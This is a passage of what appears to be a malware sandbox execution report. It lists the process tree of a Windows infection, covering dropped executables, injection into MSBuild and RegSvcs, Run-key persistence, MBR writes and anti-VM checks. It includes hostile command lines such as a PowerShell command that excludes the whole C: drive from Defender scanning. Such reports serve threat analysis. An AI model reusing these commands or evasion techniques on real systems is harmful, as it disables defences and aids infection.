                                                      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\udv4too0\udv4too0.cmdline"
                                                      7⤵
                                                        PID:3948
                                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAB7D.tmp" "c:\Users\Admin\AppData\Local\Temp\udv4too0\CSCC0231BC2967D4C708128AF45363C0D7.TMP"
                                                          8⤵
                                                            PID:2504
                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                          7⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:428
                                                      • C:\Users\Admin\AppData\Local\Temp\10492030101\UZPt0hR.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10492030101\UZPt0hR.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious behavior: MapViewOfSection
                                                        PID:5384
                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                          cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                          7⤵
                                                            PID:4008
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                              8⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              PID:6108
                                                          • C:\Windows\system32\svchost.exe
                                                            "C:\Windows\system32\svchost.exe"
                                                            7⤵
                                                            • Downloads MZ/PE file
                                                            • Adds Run key to start application
                                                            PID:2076
                                                            • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
                                                              "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
                                                              8⤵
                                                              • Sets service image path in registry
                                                              • Executes dropped EXE
                                                              • Suspicious behavior: LoadsDriver
                                                              PID:5972
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell Remove-MpPreference -ExclusionPath C:\
                                                                9⤵
                                                                  PID:14136
                                                              • C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
                                                                8⤵
                                                                • Deletes itself
                                                                • Executes dropped EXE
                                                                PID:2044
                                                                • C:\Users\Admin\AppData\Local\Temp\{89791724-7f53-4a55-9d9a-fc55daaa5c65}\259075a7.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\{89791724-7f53-4a55-9d9a-fc55daaa5c65}\259075a7.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot
                                                                  9⤵
                                                                  • Executes dropped EXE
                                                                  • Checks for VirtualBox DLLs, possible anti-VM trick
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:676
                                                                  • C:\Users\Admin\AppData\Local\Temp\{7fa4d5ac-2290-4c4e-863e-373768b90f43}\eb758663.exe
                                                                    C:/Users/Admin/AppData/Local/Temp/{7fa4d5ac-2290-4c4e-863e-373768b90f43}/\eb758663.exe -accepteula -adinsilent -silent -processlevel 2 -postboot
                                                                    10⤵
                                                                    • Drops file in Drivers directory
                                                                    • Sets service image path in registry
                                                                    • Executes dropped EXE
                                                                    • Impair Defenses: Safe Mode Boot
                                                                    • Loads dropped DLL
                                                                    • Adds Run key to start application
                                                                    • Enumerates connected drives
                                                                    • Writes to the Master Boot Record (MBR)
                                                                    • Checks for VirtualBox DLLs, possible anti-VM trick
                                                                    • Event Triggered Execution: Netsh Helper DLL
                                                                    • System Location Discovery: System Language Discovery
                                                                    • Suspicious behavior: LoadsDriver
                                                                    PID:9164
                                                          • C:\Users\Admin\AppData\Local\Temp\10492040101\larBxd7.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10492040101\larBxd7.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • System Location Discovery: System Language Discovery
                                                            PID:13836
                                                          • C:\Users\Admin\AppData\Local\Temp\10492050101\b18d882399.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10492050101\b18d882399.exe"
                                                            6⤵
                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                            • Checks BIOS information in registry
                                                            • Executes dropped EXE
                                                            • Identifies Wine through registry keys
                                                            • Writes to the Master Boot Record (MBR)
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            • System Location Discovery: System Language Discovery
                                                            PID:6784
                                                          • C:\Users\Admin\AppData\Local\Temp\10492060101\9sWdA2p.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10492060101\9sWdA2p.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • System Location Discovery: System Language Discovery
                                                            PID:7064
                                                          • C:\Windows\SysWOW64\msiexec.exe
                                                            "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10492070271\ArFLIYD.msi" /quiet
                                                            6⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:5124
                                                          • C:\Users\Admin\AppData\Local\Temp\10492080101\AfkeY2q.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10492080101\AfkeY2q.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetThreadContext
                                                            • System Location Discovery: System Language Discovery
                                                            PID:3712
                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                              7⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:8400
                                                          • C:\Users\Admin\AppData\Local\Temp\10492090101\Rm3cVPI.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10492090101\Rm3cVPI.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • System Location Discovery: System Language Discovery
                                                            PID:11260
                                                          • C:\Users\Admin\AppData\Local\Temp\10492100101\qhjMWht.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10492100101\qhjMWht.exe"
                                                            6⤵
                                                              PID:9620
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
                                                    1⤵
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:4548
                                                    • C:\Windows\explorer.exe
                                                      explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
                                                      2⤵
                                                        PID:964
                                                    • C:\Windows\explorer.exe
                                                      C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                      1⤵
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:4732
                                                      • C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
                                                        "C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of SetThreadContext
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:5956
                                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uyvfwbk3\uyvfwbk3.cmdline"
                                                          3⤵
                                                          • Suspicious use of WriteProcessMemory
                                                          PID:1064
                                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFB96.tmp" "c:\Users\Admin\AppData\Local\Temp\uyvfwbk3\CSC9D2A64F9ACC47EFA5EE9E298DA93C4.TMP"
                                                            4⤵
                                                              PID:2164
                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                            3⤵
                                                              PID:4016
                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                              3⤵
                                                                PID:3412
                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                3⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:1756
                                                          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                            C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                            1⤵
                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                            • Checks BIOS information in registry
                                                            • Executes dropped EXE
                                                            • Identifies Wine through registry keys
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:3772
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
                                                            1⤵
                                                              PID:3904
                                                              • C:\Windows\explorer.exe
                                                                explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
                                                                2⤵
                                                                  PID:6104
                                                              • C:\Windows\explorer.exe
                                                                C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                1⤵
                                                                  PID:3972
                                                                  • C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
                                                                    "C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe"
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:664
                                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pilalak2\pilalak2.cmdline"
                                                                      3⤵
                                                                        PID:3568
                                                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES32F2.tmp" "c:\Users\Admin\AppData\Local\Temp\pilalak2\CSC972A2A946F304CB1A659B5C9E058FBCF.TMP"
                                                                          4⤵
                                                                            PID:2848
                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                          3⤵
                                                                            PID:212
                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                            3⤵
                                                                              PID:4336
                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                              3⤵
                                                                                PID:5388
                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                3⤵
                                                                                  PID:4860
                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                  3⤵
                                                                                    PID:1188
                                                                              • C:\Windows\system32\msiexec.exe
                                                                                C:\Windows\system32\msiexec.exe /V
                                                                                1⤵
                                                                                • Enumerates connected drives
                                                                                • Drops file in Windows directory
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:2864
                                                                                • C:\Users\Admin\AppData\Local\Insulin\steamerrorreporter.exe
                                                                                  "C:\Users\Admin\AppData\Local\Insulin\steamerrorreporter.exe"
                                                                                  2⤵
                                                                                  • Executes dropped EXE
                                                                                  • Loads dropped DLL
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:5524
                                                                                  • C:\Users\Admin\AppData\Roaming\Servicemon\steamerrorreporter.exe
                                                                                    C:\Users\Admin\AppData\Roaming\Servicemon\steamerrorreporter.exe
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    • Suspicious use of SetThreadContext
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                    PID:4884
                                                                                    • C:\Users\Admin\AppData\Local\Temp\remoteBggbv2.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\remoteBggbv2.exe
                                                                                      4⤵
                                                                                      • Loads dropped DLL
                                                                                      PID:5716
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\SysWOW64\cmd.exe
                                                                                      4⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:5388
                                                                                • C:\Users\Admin\AppData\Local\Insulin\steamerrorreporter.exe
                                                                                  "C:\Users\Admin\AppData\Local\Insulin\steamerrorreporter.exe"
                                                                                  2⤵
                                                                                  • Executes dropped EXE
                                                                                  • Loads dropped DLL
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:2104
                                                                                  • C:\Users\Admin\AppData\Roaming\Servicemon\steamerrorreporter.exe
                                                                                    C:\Users\Admin\AppData\Roaming\Servicemon\steamerrorreporter.exe
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                    PID:7792
                                                                                    • C:\Users\Admin\AppData\Local\Temp\remoteBggbv2.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\remoteBggbv2.exe
                                                                                      4⤵
                                                                                      • Loads dropped DLL
                                                                                      PID:13060
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\SysWOW64\cmd.exe
                                                                                      4⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:11116
                                                                              • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                                                "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                                                1⤵
                                                                                  PID:5592
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                                                                  1⤵
                                                                                    PID:4488
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
                                                                                    1⤵
                                                                                      PID:3996
                                                                                      • C:\Windows\explorer.exe
                                                                                        explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
                                                                                        2⤵
                                                                                          PID:5620
                                                                                      • C:\Windows\explorer.exe
                                                                                        C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                        1⤵
                                                                                          PID:1064
                                                                                          • C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
                                                                                            "C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe"
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of SetThreadContext
                                                                                            PID:636
                                                                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5koypwj0\5koypwj0.cmdline"
                                                                                              3⤵
                                                                                                PID:4780
                                                                                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA5A1.tmp" "c:\Users\Admin\AppData\Local\Temp\5koypwj0\CSC2F2F97E5DAC448219AB05426ADE536C2.TMP"
                                                                                                  4⤵
                                                                                                    PID:5412
                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                  3⤵
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:824
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
                                                                                              1⤵
                                                                                                PID:1196
                                                                                                • C:\Windows\explorer.exe
                                                                                                  explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
                                                                                                  2⤵
                                                                                                    PID:5844
                                                                                                • C:\Windows\explorer.exe
                                                                                                  C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                  1⤵
                                                                                                    PID:3844
                                                                                                    • C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
                                                                                                      "C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe"
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      PID:5652
                                                                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nu3hbnym\nu3hbnym.cmdline"
                                                                                                        3⤵
                                                                                                          PID:2316
                                                                                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB476.tmp" "c:\Users\Admin\AppData\Local\Temp\nu3hbnym\CSC62AED2BFDD5B4836A1C9C9809A5FCEEE.TMP"
                                                                                                            4⤵
                                                                                                              PID:5900
                                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                            3⤵
                                                                                                              PID:5896
                                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                              3⤵
                                                                                                                PID:6064
                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                3⤵
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                PID:5336
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
                                                                                                            1⤵
                                                                                                              PID:676
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
                                                                                                              1⤵
                                                                                                                PID:3980
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                1⤵
                                                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                • Checks BIOS information in registry
                                                                                                                • Executes dropped EXE
                                                                                                                • Identifies Wine through registry keys
                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                PID:14328
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\{759d8c2d-fe1d-41be-8619-81267b0d226a}\d597609d-7c68-4671-b285-c6d7166535f2.cmd"
                                                                                                                1⤵
                                                                                                                  PID:9268
                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                    ping 127.0.0.1 -n 1
                                                                                                                    2⤵
                                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                    PID:9596
                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                    ping 127.0.0.1 -n 1
                                                                                                                    2⤵
                                                                                                                      PID:9648
                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                      2⤵
                                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                      PID:9684
                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                      2⤵
                                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                      PID:9708
                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                      2⤵
                                                                                                                        PID:9756
                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                        2⤵
                                                                                                                        • Runs ping.exe
                                                                                                                        PID:9904
                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                        2⤵
                                                                                                                          PID:9984
                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                          2⤵
                                                                                                                          • Runs ping.exe
                                                                                                                          PID:10036
                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                          2⤵
                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                          PID:10092
                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                          2⤵
                                                                                                                            PID:10148
                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                            2⤵
                                                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                            PID:10252
                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                            2⤵
                                                                                                                              PID:3264
                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                              ping 127.0.0.1 -n 1
                                                                                                                              2⤵
                                                                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                              PID:10280
                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                              ping 127.0.0.1 -n 1
                                                                                                                              2⤵
                                                                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                              PID:10328
                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                              ping 127.0.0.1 -n 1
                                                                                                                              2⤵
                                                                                                                              • Runs ping.exe
                                                                                                                              PID:10376
                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                              ping 127.0.0.1 -n 1
                                                                                                                              2⤵
                                                                                                                                PID:10428
                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                2⤵
                                                                                                                                  PID:10488
                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                  2⤵
                                                                                                                                    PID:4200
                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                    ping 127.0.0.1 -n 1
                                                                                                                                    2⤵
                                                                                                                                      PID:10644
                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                                      2⤵
                                                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                      PID:10728
                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                                      2⤵
                                                                                                                                        PID:10784
                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                                        2⤵
                                                                                                                                          PID:10868
                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                          2⤵
                                                                                                                                            PID:10948
                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                            2⤵
                                                                                                                                              PID:11004
                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                              ping 127.0.0.1 -n 1
                                                                                                                                              2⤵
                                                                                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                              PID:11060
                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                              ping 127.0.0.1 -n 1
                                                                                                                                              2⤵
                                                                                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                              PID:11160
                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                              ping 127.0.0.1 -n 1
                                                                                                                                              2⤵
                                                                                                                                                PID:4936
                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                2⤵
                                                                                                                                                  PID:11280
                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                  2⤵
                                                                                                                                                    PID:11348
                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                    ping 127.0.0.1 -n 1
                                                                                                                                                    2⤵
                                                                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                    • Runs ping.exe
                                                                                                                                                    PID:11392
                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                    ping 127.0.0.1 -n 1
                                                                                                                                                    2⤵
                                                                                                                                                      PID:11440
                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                                                      2⤵
                                                                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                      PID:11500
                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                                                      2⤵
                                                                                                                                                        PID:11552
                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                                                        2⤵
                                                                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                        PID:11636
                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                                                        2⤵
                                                                                                                                                        • Runs ping.exe
                                                                                                                                                        PID:11712
                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                                                        2⤵
                                                                                                                                                          PID:11772
                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                          2⤵
                                                                                                                                                          • Runs ping.exe
                                                                                                                                                          PID:11824
                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                          2⤵
                                                                                                                                                            PID:11880
                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                                            2⤵
                                                                                                                                                              PID:11988
                                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                                              ping 127.0.0.1 -n 1
                                                                                                                                                              2⤵
                                                                                                                                                                PID:2668
                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:12460
                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                                  2⤵
                                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                  PID:12512
                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                                  2⤵
                                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                  PID:12564
                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:12592
                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                    ping 127.0.0.1 -n 1
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:12640
                                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:12688
                                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:4888
                                                                                                                                                                        • C:\Windows\system32\PING.EXE
